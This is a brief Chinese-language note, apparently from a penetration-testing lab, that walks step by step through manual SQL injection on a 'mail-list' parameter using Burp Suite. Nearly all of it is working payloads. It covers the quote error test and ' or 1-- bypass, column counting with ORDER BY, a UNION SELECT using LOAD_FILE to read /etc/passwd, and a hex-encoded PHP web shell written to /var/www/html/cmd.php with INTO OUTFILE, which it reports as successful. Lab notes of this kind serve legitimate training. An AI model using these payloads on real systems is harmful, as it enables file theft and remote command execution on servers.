sql 手注 用burp suite '會爆錯  用' or 1-- //會過 有注入點 猜欄位數量 7個沒有  6個有 不會報錯  ' order by 6-- // 有6個欄位 使用 'union select into outfile寫檔案 mail-list=23132132%40test.io' union select 1,2,3,4,LOAD_FILE('/etc/passwd'),6-- // 讀出/etc/passwd 做into outfile <?php system($_GET['cmd']); ?>做hex雜湊 用notepad++轉 外掛>ASCII to hex sql injection payload mail-list=23132132%40test.io' union select 1,2,3,4,0x3C3F7068702073797374656D28245F4745545B27636D64275D293B203F3E,6 INTO OUTFILE '/var/www/html/cmd.php'-- // 訪問192.168.120.48/cmd.php 成功寫入shell 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up